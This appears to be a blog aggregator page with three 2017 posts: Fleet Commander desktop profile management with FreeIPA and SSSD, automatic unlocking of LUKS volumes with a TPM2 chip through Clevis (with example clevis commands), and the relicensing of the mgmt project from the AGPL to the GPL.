Many people ask why not use other popular Linux configuration management tools like Ansible or Puppet. The answer is simple: those are designed for servers that run in a controlled environment like a data center or the cloud. They follow a push model, where configuration changes happen as a series of commands run on the server. If something goes wrong, it is easy to audit and roll back if you have access to that server. However, desktop machines in large corporate environments often run behind a NAT or on a public WiFi; think of a laptop owned by an on-site support engineer who roams from site to site. Fleet Commander pulls a bunch of configuration data and makes it available to apps without running intrusive shell scripts or walking into users' $HOME directories. Ansible and Puppet did not solve the core problems of desktop session configuration management, so we had to create something new.

At Red Hat we talk to many enterprise desktop customers with a mixed environment of Windows, Macs and Linux desktops and our interaction with them has helped us identify this gap in the GNOME ecosystem and motivated us to roll up our sleeves and try to come up with an answer.

How to build a profile

The way Fleet Commander builds profiles is somewhat interesting compared to its competitors. Our solution is inspired by the good old Sabayon tool. In our admin web UI you get a VM desktop session where you run and configure your apps; Fleet Commander records those changes and lists them. The admin then selects the changes to include, and the final selection is bound together as part of the profile.

You can then apply the profile to individual users, groups, hosts or host groups.


Supported apps/settings

Right now we support anything dconf based (GSettings), GNOME Online Accounts, LibreOffice and NetworkManager. In the near future we plan to tackle our main problem which is giving support to browsers, we're probably going to start just with bookmarks as it is the most demanded use case.

Cockpit integration


The Fleet Commander UI runs on top of the Cockpit admin UI. Cockpit has given us a lot of stuff for free (a basic UI framework, a web service, built-in websocket support for our SPICE javascript client, among many other things).

FreeIPA Integration

A desktop configuration management solution has to be tightly tied to an identity management solution (as with Active Directory). FreeIPA is the best free software corporate identity management project out there, and integrating with it allowed us to remove quite a bit of complexity from our code base while improving security. FreeIPA now stores the profile data and the assignments to users, groups and hosts.


SSSD is the client daemon that enrolls and authenticates a Linux machine in a FreeIPA or Active Directory domain. Having Fleet Commander hook into it was a perfect fit for us, and it also allowed us to remove a bunch of code from previous versions while having a much more robust implementation. SSSD now retrieves and stores the profile data from FreeIPA.


Our new website is live! We have updated introduction materials and documentation and jimmac has put together a great design and layout. Check it out!
I'd like to thank Alexander Bokovoy and Fabiano Fidencio for their invaluable help extending FreeIPA and SSSD to integrate with Fleet Commander and Jakub for his help on the website design. If you want to know more, join us on our IRC channel (#fleet-commander @ freenode) and our GitHub project page.

It is currently available in Fedora 26 and we are in the process of releasing EPEL packages for CentOS/RHEL.

18 Oct 2017 11:56am GMT

Javier Martinez Canillas: Automatic LUKS volumes unlocking using a TPM2 chip

I joined Red Hat a few months ago, and have been working on improving the Trusted Platform Module 2.0 (TPM2) tooling, towards having a better TPM2 support for Fedora on UEFI systems.

For brevity I won't explain in this post what TPMs are and their features, but assume that readers are already familiar with trusted computing in general. Instead, I'll explain what we have been working on, the approach used and what you might expect on Fedora soon.

For an introduction to TPM, I recommend Matthew Garrett's excellent posts about the topic, Philip Tricca's presentation about TPM2 and the official Trusted Computing Group (TCG) specifications. I also found the "A Practical Guide to TPM 2.0" book to be much easier to digest than the official TCG documentation. The book is open access, which means it's freely available.

LUKS volumes unlocking using a TPM2 device

Encryption of data at rest is a key component of security. LUKS provides the ability to encrypt Linux volumes, including both data volumes and the root volume containing the OS. The OS can provide the crypto keys for data volumes, but something has to provide the key for the root volume to allow the system to boot.

The most common way to provide the crypto key to unlock a LUKS volume is to have a user type in a LUKS pass-phrase during boot. This works well for laptop and desktop systems, but is not well suited for servers or virtual machines, since it is an obstacle for automation.

So the first TPM feature we want to add to Fedora (and likely one of the most common use cases for a TPM) is the ability to bind a LUKS volume master key to a TPM2. That way the volume can be automatically unlocked (without typing a pass-phrase) by using the TPM2 to obtain the master key.

A key point here is that the actual LUKS master key is not present in plain text form on the system; it is protected by TPM encryption.

Also, by sealing the LUKS master key with a specific set of Platform Configuration Registers (PCR), one can make sure that the volume will only be unlocked if the system has not been tampered with. For example (as explained in this post), PCR7 is used to measure the UEFI Secure Boot policy and keys. So the LUKS master key can be sealed against this PCR, to avoid unsealing it if Secure Boot was disabled or the used keys were replaced.

Implementation details: Clevis

Clevis is a pluggable framework for automated decryption that has a number of "pins", where each pin implements {en,de}cryption support using a different backend. It also has a command line interface to {en,de}crypt data using these pins, create complex security policies and bind a pin to a LUKS volume to later unlock it.

Clevis relies on the José project, which is a C implementation of the Javascript Object Signing and Encryption (JOSE) standard. It also uses the LUKSMeta project to store Clevis pin metadata in a LUKS volume header.

On encryption, a Clevis pin takes some data to encrypt and a JSON configuration, and produces a JSON Web Encryption (JWE) content. This JWE has the data encrypted using a JSON Web Key (JWK) and information on how to obtain the JWK for decryption.

On decryption, the Clevis pin obtains a JWK using the information provided by a JWE and decrypts the ciphertext also stored in the JWE using that key.

Each Clevis pin defines its own JSON configuration format, how the JWK is created, where it is stored and how to retrieve it.

As mentioned, Clevis has support to bind a pin with a LUKS volume. This means that a LUKS master key is encrypted using a pin and the resulting JWE is stored in a LUKS volume meta header. That way Clevis is able to later decrypt the master key and unlock the LUKS volume. Clevis has dracut and udisks2 support to do this automatically and the next version of Clevis will also include a command line tool to unlock non-root (data) volumes.

Clevis TPM2 pin

Clevis provides a mechanism to automatically supply the LUKS master key for the root volume. The initial implementation of Clevis has support to obtain the LUKS master key from a network service, but we have extended Clevis to take advantage of a TPM2 chip, which is available on most servers, desktops and laptops.

By using a TPM, the disk can only be unlocked on a specific system: the disk will neither boot nor be accessible on another machine.

This implementation also works with UEFI Secure Boot, which will prevent the system from being booted if the firmware or system configuration has been modified or tampered with.

To make use of all the Clevis infrastructure and also be able to use the TPM2 as a part of more complex security policies, the TPM2 support was implemented as a clevis tpm2 pin.

On encryption the tpm2 pin generates a JWK, creates an object in the TPM2 with the JWK as sensitive data and binds the object (or seals if a PCR set is defined in the JSON configuration) to the TPM2.

The generated JWE contains both the public and wrapped sensitive portions of the created object, as well as information on how to unseal it from the TPM2 (hashing and key encryption algorithms used to recalculate the primary key, PCR policy for authentication, etc).

On decryption the tpm2 pin takes the JWE that contains both the sealed object and information on how to unseal it, loads the object into the TPM2 by using the public and wrapped sensitive portions and unseals the JWK to decrypt the ciphertext stored in the JWE.

The changes haven't been merged yet: since the pin uses features from tpm2-tools master, we have to wait for the next release of the tools. There are also still discussions on the pull request about some details, but it should be ready to land soon.


The Clevis command line tools can be used to encrypt and decrypt data using a TPM2 chip. The tpm2 pin has reasonable defaults, but one can configure most of its parameters using the pin JSON configuration (refer to the Clevis tpm2 pin documentation for these), e.g.:

$ echo foo | clevis encrypt tpm2 '{}' > secret.jwe

And then the data can later be decrypted with:

$ clevis decrypt < secret.jwe

To seal data against a set of PCRs:

$ echo foo | clevis encrypt tpm2 '{"pcr_ids":"8,9"}' > secret.jwe

And to bind a tpm2 pin to a LUKS volume:

$ clevis luks bind -d /dev/sda3 tpm2 '{"pcr_ids":"7"}'

The LUKS master key is not stored in raw format; instead it is wrapped with a JWK that has the same entropy as the LUKS master key. It's this JWK that is sealed with the TPM2.

Since Clevis has both dracut and udisks2 hooks, the command above is enough to have the LUKS volume be automatically unlocked using the TPM2.

The next version of Clevis also has a clevis-luks-unlock command line tool, so a LUKS volume could be manually unlocked with:

$ clevis luks unlock -d /dev/sda3

Using the TPM2 as a part of more complex security policies

One of Clevis' supported pins is the Shamir Shared Secret (SSS) pin, which allows encrypting a secret using a JWK that is then split into different parts. Each part is then encrypted using another pin, and a threshold is chosen to decide how many parts are needed to reconstruct the encryption key, so the secret can be decrypted.

This allows, for example, splitting the JWK used to wrap the LUKS master key in two parts. One part of the JWK could be sealed with the TPM2 and the other part stored on a remote server. By sealing a JWK that's only one part of the key needed to decrypt the LUKS master key, an attacker obtaining the data sealed in the TPM won't be able to unlock the LUKS volume.

The Clevis encrypt command for this particular example would be:

$ clevis luks bind -d /dev/sda3 sss '{"t": 2, "pins": \
  {"http":{"url":"http://server.local/key"}, "tpm2": \

Limitations of this approach

One problem with the current implementation is that Clevis is a user-space tool and so it can't be used to unlock a LUKS volume that has an encrypted /boot directory. The boot partition still needs to remain unencrypted so the bootloader is able to load a Linux kernel and an initramfs that contains Clevis, to unlock the encrypted LUKS volume for the root partition.

Since the initramfs is not signed on a Secure Boot setup, an attacker could replace the initramfs and unlock the LUKS volume. So the threat model this protects against is an attacker who can get access to the encrypted volume but not to the trusted machine.

There are different approaches to solve this limitation. The previously mentioned post from Matthew Garrett suggests having a small initramfs built into the signed Linux kernel. The only task of this built-in initramfs would be to unseal the LUKS master key, store it in the kernel keyring and extend PCR7 so the key can't be unsealed again. Later, the usual initramfs can unlock the LUKS volume by using the key already stored in the Linux kernel.

Another approach is to also have the /boot directory in an encrypted LUKS volume and provide support for the bootloader to unseal the master key with the TPM2, for example by supporting the same JWE format in the LUKS meta header used by Clevis. That way only a signed bootloader would be able to unlock the LUKS volume that contains /boot, so an attacker won't be able to tamper with the system by replacing the initramfs, since it will be in an encrypted partition.

But there is work to be done for both approaches, so it will take some time until we have protection for this threat model.

Still, having an encrypted root partition that is only automatically unlocked on a trusted machine has many use cases. To list a few examples:


I would like to thank Nathaniel McCallum and Russell Doty for their feedback and suggestions for this article.

18 Oct 2017 8:59am GMT

James Just James: Copyleft is Dead. Long live Copyleft!

As you may have noticed, we recently re-licensed mgmt from the AGPL (Affero General Public License) to the regular GPL. This is a post explaining the decision, and it hopefully includes some insights at the intersection of technology and legal issues.


I am not a lawyer, and these are not necessarily the opinions of my employer. I think I'm knowledgeable in this area, but I'm happy to be corrected in the comments. I'm friends with a number of lawyers, and they like to include disclaimer sections, so I'll include this so that I blend in better.


It's well understood in infrastructure coding that the control of, and trust in the software is paramount. It can be risky basing your business off of a product if the vendor has the ultimate ability to change the behaviour, discontinue the software, make it prohibitively expensive, or in the extreme case, use it as a backdoor for corporate espionage.

While many businesses have realized this, it's unfortunate that many individuals have not. The difference might be protecting corporate secrets vs. individual freedoms, but that's a discussion for another time. I use Fedora and GNOME, and don't have any Apple products, but you might value the temporary convenience more. I also support your personal choice to use the software you want. (Not sarcasm.)

This is one reason why Red Hat has done so well. If they ever mistreated their customers, those customers would be able to fork the code and grow new communities. The lack of an asymmetrical power dynamic keeps customers feeling safe and happy!

Section 13:

The main difference between the AGPL and the GPL is the "Remote Network Interaction" section. Here's a simplified explanation:

Both licenses require that if you modify the code, you give back your contributions. "Copyleft" is Copyright law that legally requires this share-alike provision. These licenses never require this when using the software privately, whether as an individual or within a company. The thing that "activates" the licenses is distribution. If you sell or give someone a modified copy of the program, then you must also include the source code.

The AGPL extends the GPL in that it also activates the license if the software runs on an application provider's computer, which is common with hosted software-as-a-service. In other words, if you were an external user of a web calendaring solution containing AGPL software, then that provider would have to offer up the code to the application, whereas the GPL would not require this. Neither license would require distribution of code if the application was only available to employees of that company, nor would they require distribution of the software used to deploy the calendaring software.

Network Effects and Configuration Management:

If you're familiar with the infrastructure automation space, you're probably already aware of three interesting facts:

  1. Hosted configuration management as a service probably isn't plausible
  2. The infrastructure automation your product uses isn't the product
  3. Copyleft does not apply to the code or declarations that describe your configuration

As a result of this, it's unlikely that the Section 13 requirement of the AGPL would actually ever apply to anyone using mgmt!

A number of high profile organizations outright forbid the use of the AGPL. Google and OpenStack are two notable examples. There are others. Many claim this is because the cost of legal compliance is high. One argument I heard is that it's because they live in fear that their entire proprietary software development business would be turned on its head if some sufficiently important library were AGPL. Despite weak enforcement, and with many companies flouting the GPL, Linux and the software industry have not shown signs of waning. Compliance has even helped their bottom line.

Nevertheless, as a result of misunderstanding, fear and doubt, using the AGPL still cuts off a portion of your potential contributors. Possibly overzealous enforcement has also caused some to fear the GPL.

Foundations and Permissive Licensing:

Why use copyleft at all? Copyleft is an inexpensive way of keeping the various contributors honest. It provides an organizational constitution so that community members who invest in the project all get a fair, representative stake.

In the corporate world, there is a lot of governance in the form of "foundations". The most well-known ones exist in the United States and are usually classified as 501(c)(6) under US Federal tax law. They aren't allowed to generate a profit, but they exist to fulfill the desires of their dues-paying membership. You've probably heard of the Linux Foundation, the .NET foundation, the OpenStack Foundation, and the recent Linux Foundation child, the CNCF. With the major exception being Linux, they primarily fund permissively licensed projects since that's what their members demand, and the foundation probably also helps convince some percentage of their membership into voluntarily contributing back code.

Running an organization like this is possible, but it certainly adds a layer of overhead that I don't think is necessary for mgmt at this point.

It's also interesting to note that of the top corporate contributions to open source, virtually all of the licensing is permissive, usually under the Apache v2 license. I'm not against using or contributing to permissively licensed projects, but I do think there's a danger if most of our software becomes a monoculture of non-copyleft, and I wanted to take a stand against that trend.


I started mgmt to show that there was still innovation to be done in the automation space, and I think I've achieved that. I still have more to prove, but I think I'm on the right path. I also wanted to innovate in licensing by showing that the AGPL isn't actually harmful. I'm sad to say that I've lost that battle, and that maybe it was too hard to innovate in too many different places simultaneously.

Red Hat has been my main source of funding for this work up until now, and I'm grateful for that, but I'm sad to say that they've officially set my time quota to zero. Without their support, I just don't have the energy to innovate in both areas. I'm sad to say it, but I'm more interested in the technical advancements than I am in the licensing progress it might have brought to our software ecosystem.

Conclusion / TL;DR:

If you, your organization, or someone you know would like to help fund my mgmt work either via a development grant, contract or offer of employment, or if you'd like to be a contributor to the project, please let me know! Without your support, mgmt will die.

Happy Hacking,


You can follow James on Twitter for more frequent updates and other random noise.

18 Oct 2017 1:22am GMT